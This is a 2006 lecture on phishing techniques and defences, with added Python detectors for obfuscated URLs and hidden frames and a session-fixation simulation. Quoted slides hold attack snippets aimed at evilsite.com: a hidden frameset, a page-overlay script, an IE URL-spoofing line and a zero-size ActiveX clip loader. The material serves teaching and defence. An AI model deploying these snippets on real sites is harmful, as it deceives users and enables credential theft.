
  1. Talk (III): Introduction to Phishing. Jenq-Haur Wang, Academia Sinica, Nov. 16-17, 2006

  2. Outline
  • Introduction
  • Phishing Techniques
  • Anti-Phishing Attempts
  Phishing

  3. Introduction
  • "Phishing": to "fish" for passwords and financial data from the sea of Internet users
  • First mentioned on a Usenet newsgroup in 1996
  • Identity theft
  • Online fraud

  4. Why Phishing?
  • E-commerce sites: shopping, bidding, …
  • E-banking (network banking): credit card, stock, insurance, …
  • Low cost
  • Ex. In Taiwan [source: http://news.chinatimes.com/Chinatimes/newslist/newslist-content/0,3546,110507+112006111700256,00.html]:
    • Chinatrust Bank: 1 million (20%), 56%
    • Cathay United Bank: 0.7 million, 50%
    • Taishin Bank: 0.6 million (1/3)

  5. References
  • Wikipedia, "Phishing": http://en.wikipedia.org/wiki/Phishing
  • Anti-Phishing Working Group (APWG): http://www.antiphishing.org/
  • Gunter Ollmann, "The Phishing Guide: Understanding and Preventing Phishing Attacks": http://www.technicalinfo.net/papers/Phishing.html

  6. Phishing Activity Trend (chart only)

  7. Phishing Activity Trend (chart only)

  9. Top Used Ports Hosting Phishing Data Collection Servers (chart only)

  11. Most Targeted Industry Sectors (chart only)

  13. A Closer Look
  • The most targeted industry sector for phishing attacks: financial services, 73% -> 92.6%
  • Country hosting the most phishing sites: US, 29% -> 27.88%
  • [Source: APWG Phishing Activity Trends Report, Oct. 2004 and Aug. 2006]

  14. Project: Crimeware
  • Phishing-based Trojans: keyloggers
    • Code designed to collect information on the end user in order to steal that user's credentials
    • Targeted at financial sites, e-commerce sites, or webmail sites
  • Phishing-based Trojans: redirectors
    • Code designed to redirect end users' network traffic to a location they did not intend to go to (e.g. by rewriting DNS or proxy settings)
  • Spyware


  18. Damage Caused by Phishing
  • Identity theft
    • Loss of personal information: credit card number, social security number, …
    • Creating fake accounts in a victim's name, ruining a victim's credit, preventing victims from accessing their own accounts, …
  • Financial loss
    • 1.2 million users in the US, $929 million USD
    • US businesses lose $2 billion USD per year
    • UK web banking fraud: £12.2m in 2004, £23.2m in 2005
    • 1 in 20 users claim to have suffered a loss due to phishing in 2005

  19. Phishing Message Delivery
  • Email and spam
  • Web-based delivery
  • Instant messaging
  • Trojaned hosts

  20. Example: Delivered by E-mail (screenshot only)

  21. Example: Web-based Delivery (screenshot only)

  22. Phishing Examples
  • PayPal
  • SouthTrust Bank

  23. PayPal (screenshot only)

  24. SouthTrust Bank (screenshot only)

  25. Phishing Techniques
  • Social engineering
  • Automated attack system

  26. Some Common Tricks
  • Misspelled URLs or the use of subdomains, e.g. http://www.mybank.com.example.com/ (the registrable domain is example.com; "www.mybank.com" is just a subdomain the phisher controls)
  • Making the anchor text for a link appear to be a valid URL when the link actually goes to the phisher's site, e.g. http://www.google.com@members.tripod.com/ (everything before "@" is treated as user info; the browser connects to members.tripod.com)
  • Using JavaScript commands to alter the address bar
  • Using a bank's or service's own scripts against the victim (cross-site scripting)

  27. Social Engineering Techniques
  • Pretexting: creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action; usually done over the telephone
  • Phishing: emails appearing to come from a legitimate business (a bank or credit card company) requesting "verification" of information and warning of some dire consequence if it is not done

  28. Social Engineering Techniques
  • Trojan horse / gimmes: gimmes can arrive as an email attachment promising anything from a cool or sexy screen saver, an important anti-virus or system upgrade, or even the latest dirt on an employee
  • Quid pro quo (Latin for "something for something"): an attacker calls random numbers at a company claiming to be calling back from technical support. Eventually they hit someone with a legitimate problem, who is grateful that someone is calling back to help. The attacker "helps" solve the problem and in the process has the user type commands that give the attacker access and/or launch malware

  29. Automated Attack Systems
  • APWG suggested that conventional phishing techniques could become obsolete as people become increasingly aware of the social engineering techniques used by phishers
  • They propose that pharming and other uses of malware will become more common tools for stealing information

  30. Phishing Attack Vectors
  • Man-in-the-middle attacks
  • URL obfuscation attacks
  • Cross-site scripting attacks
  • Preset session attacks
  • Hidden attacks
  • Observing customer data
  • Client-side vulnerability exploitation

  31. Man-in-the-Middle Attack (diagram only)

  32. URL Obfuscation
  • Bad domain names: http://www.mybánk.com/ (look-alike, non-ASCII characters in the hostname)
  • Friendly login URLs: http://mybank.com:ebank@evilsite.com/login.htm ("mybank.com:ebank" is parsed as username:password; the real host is evilsite.com)
  • Third-party shortened URLs: http://tinyurl.com/xxxxxx (the destination is hidden behind the shortener)
  • Hostname obfuscation: http://mybank.com:ebank@210.134.161.35/login.htm (the host is a raw IP address)
  • URL obfuscation: escape encoding (%20), Unicode encoding (%uFD3F), …
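The following script is an added example, not part of the original slides: it runs the checks a link filter or anti-phishing toolbar would apply for the tricks listed on slides 26 and 32 (user-info before "@", raw IP hosts, non-ASCII or punycode hostnames, percent-encoded bytes in the authority part, URL shorteners, and the brand name appearing only as a subdomain). The shortener list, the `brand` parameter and the two-label approximation of the registrable domain are assumptions made for this example; production code should consult the Public Suffix List.

```python
"""Flag common URL-obfuscation tricks in a candidate link (added example)."""
import ipaddress
import re
from urllib.parse import urlsplit

# Assumed allow-list of well-known URL shorteners (an assumption for this example).
SHORTENER_DOMAINS = {"tinyurl.com", "bit.ly", "t.co", "goo.gl", "ow.ly"}


def registrable_domain(host: str) -> str:
    """Naive 'last two labels' approximation of the registrable domain.
    Real code should use the Public Suffix List (co.uk etc. need three labels)."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def is_ip_literal(host: str) -> bool:
    """True when the host part is a raw IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyze_url(url: str, brand: str) -> list:
    """Return the obfuscation tricks found in `url`, given the brand name
    (e.g. 'mybank') the link claims to belong to. Empty list = nothing suspicious."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    brand = brand.lower()
    findings = []

    # Trick 1: "user:password@host". Browsers ignore everything before '@',
    # so http://www.google.com@members.tripod.com/ really goes to tripod.com.
    if parts.username is not None:
        findings.append("userinfo")
        if brand in parts.username.lower():
            findings.append("brand_in_userinfo")

    # Trick 2: raw IP address instead of a hostname.
    if is_ip_literal(host):
        findings.append("ip_host")

    # Trick 3: look-alike characters in the hostname (mybánk.com), either as raw
    # Unicode or already converted to punycode (xn--...).
    if not host.isascii():
        findings.append("non_ascii_host")
    elif any(label.startswith("xn--") for label in host.split(".")):
        findings.append("punycode_host")

    # Trick 4: percent-encoded bytes inside the authority part (e.g. %01).
    if re.search(r"%[0-9a-fA-F]{2}", parts.netloc):
        findings.append("encoded_netloc")

    # Trick 5: third-party shortener hiding the destination.
    if registrable_domain(host) in SHORTENER_DOMAINS:
        findings.append("shortener")

    # Trick 6: brand appears only as a subdomain of someone else's domain
    # (www.mybank.com.example.com).
    if host and not is_ip_literal(host):
        reg = registrable_domain(host)
        if brand not in reg and any(brand in label for label in host.split(".")[:-2]):
            findings.append("brand_in_subdomain")

    return findings


if __name__ == "__main__":
    # The sample links are the ones quoted on slides 26 and 32.
    for link in ("http://www.mybank.com.example.com/",
                 "http://mybank.com:ebank@evilsite.com/login.htm",
                 "http://mybank.com:ebank@210.134.161.35/login.htm",
                 "http://www.mybánk.com/",
                 "http://tinyurl.com/xxxxxx",
                 "https://www.mybank.com/login"):
        print(f"{link:55s} -> {analyze_url(link, 'mybank')}")
```

The analysis deliberately looks at the parsed components rather than the raw string: the whole point of the "friendly login URL" trick is that a human reads left to right while the browser reads the authority from the right of the "@".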

  33. Cross-Site Scripting (diagram only)

  34. Cross-site Scripting (CSS or XSS)
  • Using a custom URL or code injection into a valid web application URL or embedded data field, so that the phisher's script runs on the legitimate site's own origin
  • The result of poor web application development processes: user-supplied data is written back into the page without output encoding

  35. Preset Session Attack (diagram only)

  36. Preset Session Attack
  • Both HTTP and HTTPS are stateless protocols
  • The most common way of managing state within applications is through session identifiers (SessionIDs), carried in cookies, hidden fields, or fields contained within page URLs
  • The phishing message contains a web link to the real application server, but the link also carries a predefined SessionID field
  • The attacker's system constantly polls the application server for a restricted page using the preset SessionID; once the victim has logged in under that SessionID, the poll succeeds (the attack is also known as session fixation)
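The following simulation is an added example and not part of the original talk. A toy application keeps state in SessionIDs exactly as slide 36 describes: it adopts any SessionID a client presents, and (in the vulnerable configuration) keeps the same ID across login. The phisher pre-picks an ID, puts it in a link to the real server, and polls the restricted page with it. The fixed configuration regenerates the SessionID at authentication, so the planted ID never becomes an authenticated one. The user name, password and host name are constructed for the example.

```python
"""Preset session attack (session fixation) against a toy web app, and the fix."""
import secrets

# Constructed credential store for the example.
PASSWORDS = {"alice": "correct horse battery staple"}


class BankApp:
    """Minimal stand-in for an application that keeps state in SessionIDs.
    rotate_on_login=False reproduces the weakness on slide 36."""

    def __init__(self, rotate_on_login: bool):
        self.rotate_on_login = rotate_on_login
        self.sessions = {}  # SessionID -> {"user": str or None}

    def visit(self, sid=None):
        """Serve a request. If the client presents an unknown SessionID (for example
        from a ?SessionID= URL parameter), the app adopts it as a new anonymous
        session; this is what lets the phisher choose the victim's ID."""
        if sid is None:
            sid = secrets.token_hex(16)
        self.sessions.setdefault(sid, {"user": None})
        return sid

    def login(self, sid, user, password):
        """Authenticate the session `sid`. Returns (session id now in use, success)."""
        sid = self.visit(sid)
        if PASSWORDS.get(user) != password:
            return sid, False
        if self.rotate_on_login:
            # Fix: discard the pre-authentication ID and issue a fresh one, so any
            # ID the attacker planted is no longer bound to the authenticated session.
            del self.sessions[sid]
            sid = secrets.token_hex(16)
            self.sessions[sid] = {"user": None}
        self.sessions[sid]["user"] = user
        return sid, True

    def account_page(self, sid):
        """Restricted page: returns data only for an authenticated SessionID."""
        session = self.sessions.get(sid)
        if session is None or session["user"] is None:
            return None
        return f"account summary for {session['user']}"


def run_attack(app: BankApp):
    """Simulate the attack: the phisher pre-picks a SessionID, embeds it in a link to
    the real server, the victim logs in through that link, and the phisher polls the
    restricted page with the same ID. Returns what the phisher obtains (None = nothing)."""
    preset_sid = secrets.token_hex(16)
    # Hypothetical host; the link points at the genuine application, not a clone.
    phishing_link = f"https://mybank.example/login?SessionID={preset_sid}"
    print("phishing link:", phishing_link)

    # Victim follows the link and authenticates; the server sees the preset ID.
    _, ok = app.login(preset_sid, "alice", PASSWORDS["alice"])
    assert ok

    # Attacker "constantly polls the application server for a restricted page"
    # with the ID it planted.
    return app.account_page(preset_sid)


if __name__ == "__main__":
    print("vulnerable:", run_attack(BankApp(rotate_on_login=False)))
    print("fixed:     ", run_attack(BankApp(rotate_on_login=True)))
```

Rotating the identifier at login is the essential fix; refusing to adopt unknown SessionIDs at all (issuing a fresh one instead) closes the hole earlier, and both are worth doing.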

  37. Hidden Attacks
  • Hidden frames
  • Overriding page content
  • Graphical substitution

  38. Hidden Frames
  • The first frame takes 100% of the window and shows the real site; the second frame gets the remaining 0% and silently loads the phisher's page:
  <frameset rows="100%,*" framespacing="0">
    <frame name="real" src="http://mybank.com/" scrolling="auto">
    <frame name="hiddenContent" src="http://evilsite.com/bad.htm" scrolling="auto">
  </frameset>

  39. Overriding Page Content
  • Script writes an absolutely positioned, high z-index DIV over the real page content (excerpt; the slide truncates the rest):
  var d = document;
  d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2"><TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>');
  d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');
  ......

  40. Graphical Substitution (screenshot only)

  41. Observing Customer Data
  • Keylogging
  • Screen grabbing

  42. Client-side Vulnerability Exploitation
  • MS Internet Explorer mishandling of a control character (%01) in the user-info part of a URL: the address bar showed www.mybank.com while the page was fetched from evilsite.com
  location.href=unescape('http://www.mybank.com%01@evilsite.com/phishing/fakepage.htm');
  • RealPlayer: an ActiveX object embedded at zero size, then driven from script to fetch a malicious clip
  <OBJECT ID="RealOneActiveXObject" WIDTH=0 HEIGHT=0 CLASSID="CLSID:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5"></OBJECT>
  // Play a clip and show new status display
  function clipPlay() {
    window.parent.external.PlayClip("rtsp://evilsite.com/hackme.rm", "Title=Glorious Day|Artist name=Me Alone")
  }
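The following scanner is an added example, not part of the original slides. It applies the detection logic a mail gateway or web proxy would use against the two hidden-content tricks shown on slides 38 and 42: a frameset whose "100%,*" layout collapses one frame to zero height, frames that mix origins, and frames/objects embedded at zero size or hidden by CSS. The sample HTML is the markup quoted on those slides plus one constructed benign iframe; the finding names are this example's own.

```python
"""Scan HTML for hidden frames and zero-size embedded objects (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class HiddenContentScanner(HTMLParser):
    """Collects findings about framed or embedded content the user cannot see."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.frame_hosts = set()

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names; valueless attrs are None.
        a = {name: (value or "") for name, value in attrs}

        if tag == "frameset":
            # rows="100%,*": the first frame fills the window, the rest get 0 px.
            sizes = [s.strip() for s in (a.get("rows") or a.get("cols") or "").split(",")]
            if len(sizes) > 1 and "100%" in sizes and any(s in ("*", "0") for s in sizes):
                self.findings.append("collapsed_frameset")

        if tag in ("frame", "iframe", "object", "embed"):
            src = a.get("src") or a.get("data") or ""
            host = urlsplit(src).hostname
            if host:
                self.frame_hosts.add(host)
            style = a.get("style", "").replace(" ", "").lower()
            if (a.get("width") in ("0", "0px") or a.get("height") in ("0", "0px")
                    or "display:none" in style or "visibility:hidden" in style):
                self.findings.append(f"zero_size_{tag}")

    def report(self):
        findings = list(self.findings)
        # Frames drawn from more than one origin: the visible one may be the real
        # site while an invisible one belongs to the phisher.
        if len(self.frame_hosts) > 1:
            findings.append("mixed_origin_frames")
        return findings


def scan_html(html: str) -> list:
    """Return the list of hidden-content findings for a page."""
    scanner = HiddenContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.report()


# Inputs: the frameset from slide 38, the OBJECT tag from slide 42, and a
# constructed benign iframe for comparison.
HIDDEN_FRAMES = ('<frameset rows="100%,*" framespacing="0">'
                 '<frame name="real" src="http://mybank.com/" scrolling="auto">'
                 '<frame name="hiddenContent" src="http://evilsite.com/bad.htm" scrolling="auto">'
                 '</frameset>')
HIDDEN_OBJECT = ('<OBJECT ID="RealOneActiveXObject" WIDTH=0 HEIGHT=0 '
                 'CLASSID="CLSID:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5"></OBJECT>')
BENIGN_IFRAME = '<iframe src="https://mybank.com/help" width="600" height="400"></iframe>'

if __name__ == "__main__":
    for name, html in (("hidden frames", HIDDEN_FRAMES),
                       ("hidden object", HIDDEN_OBJECT),
                       ("benign iframe", BENIGN_IFRAME)):
        print(f"{name}: {scan_html(html)}")
```

A real filter would also resolve relative `src` values against the page URL and treat a zero-size object with a known-exploitable CLSID as a higher-severity hit; the structure above is where those rules plug in.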

  43. Anti-Phishing Attempts
  • Legislation
  • User training
  • Technical measures

  44. Legal Actions
  • On Jan. 26, 2004, the FTC (Federal Trade Commission) filed the first lawsuit against a suspected phisher (a fake AOL web page)
  • In the US, the Anti-Phishing Act of 2005 (S.472) would impose a five-year prison sentence and/or a fine on individuals who commit identity theft using falsified corporate websites or e-mails

  45. User Training
  • Contact the company that is the subject of the email to check that the email is legitimate
  • Type a trusted web address for the company's website into the browser's address bar instead of following the link
  • Nearly all legitimate email messages from companies to their customers contain an item of information that is not readily available to phishers: PayPal addresses its customers by username; banks quote a partial account number
  • Not always reliable

  46. Anti-Phishing Software
  • Acts as a toolbar that displays the real domain name of the visited website
  • Microsoft IE7
  • Mozilla Firefox 2
  • Opera 9.1
  • Netscape 8.1
  • Google Safe Browsing for Firefox
  • NetCraft toolbar
  • eBay toolbar
  • Earthlink ScamBlocker
  • GeoTrust TrustWatch

  47. Technical Measures
  • Client-side
  • Server-side
  • Enterprise-level

  48. 1. Client-Side
  • Desktop protection agents
  • Email sophistication
  • Browser capabilities
  • Digitally signed email
  • Customer vigilance

  49. Desktop Protection Agents
  • Anti-virus
  • Personal firewall
  • Personal anti-spam
  • Spyware detection

  50. Functionalities Needed
  • Ability to detect and block attempts to install malicious software
  • Ability to identify spam delivery techniques
  • Ability to update the latest anti-virus and anti-spam signatures
  • Ability to detect unauthorized connections
  • Ability to block outbound delivery of sensitive information to suspected malicious parties